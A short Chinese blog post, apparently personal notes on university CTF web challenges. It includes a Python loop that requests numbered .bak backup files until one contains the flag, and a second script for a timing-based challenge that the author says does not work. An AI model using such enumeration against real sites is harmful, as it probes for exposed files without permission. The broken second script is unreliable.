WEB

源代码

1574860097929

备份

想了很久的备份文件后缀,index.php~,index.php.bak,index.php.save等等,但是都无果。网上找到了学长的WP,才发现有些坑。

题目给出了两个.bak

1574861933899

然后手动验证可以发现3.bak和5.bak也存在。但是怎么想到的998.bak中又flag?

import requests
for i in range(1000):
    url = 'http://bxs.cumt.edu.cn/challenge/web/code/{}.bak'.format(i)
    r = requests.get(url)
    print(i)
    if 'flag' in r.text:
        print(r.text)
        break

1574862032725

其实这些题暑假很多都做过一遍了,但是肯定记不清楚当时具体怎么做的了,也实在不想把时间重复浪费掉,先这样吧,哪天累了可以做做这些题放松一下。

自动flag

import requests, json, urllib, re
s = requests.Session()
r = s.get(r'http://bxs.cumt.edu.cn/challenge/web/ctf0001/')
second = int(re.search(r'服务器时间:.+?\d{2}:\d{2}:(\d{2})', r.text).group(1))
print(second)
r = s.get(r'http://bxs.cumt.edu.cn/challenge/web/ctf0001/param1.php')
data = eval(urllib.parse.unquote('%5B%221%22%2C%226%22%2C%222%22%2C%228%22%2C%224%22%2C%222%22%2C%228%22%2C%224%22%2C%229%22%2C%221%22%2C%2210%22%5D'))
data = [int(i) for i in data]
print(data)
sum = 0
for i in range(1, len(data)):
    for j in range(0, len(data)//2):
        sum += data[i] * second + data[j]
print(sum)

r = s.get(r'http://bxs.cumt.edu.cn/challenge/web/ctf0001/param2.php?param={}'.format(sum))
print(json.loads(r.text)['f'].encode('utf-8').decode('unicode_escape'))

脚本不对哈,等有时间再看看

Last modification:November 27th, 2019 at 10:47 pm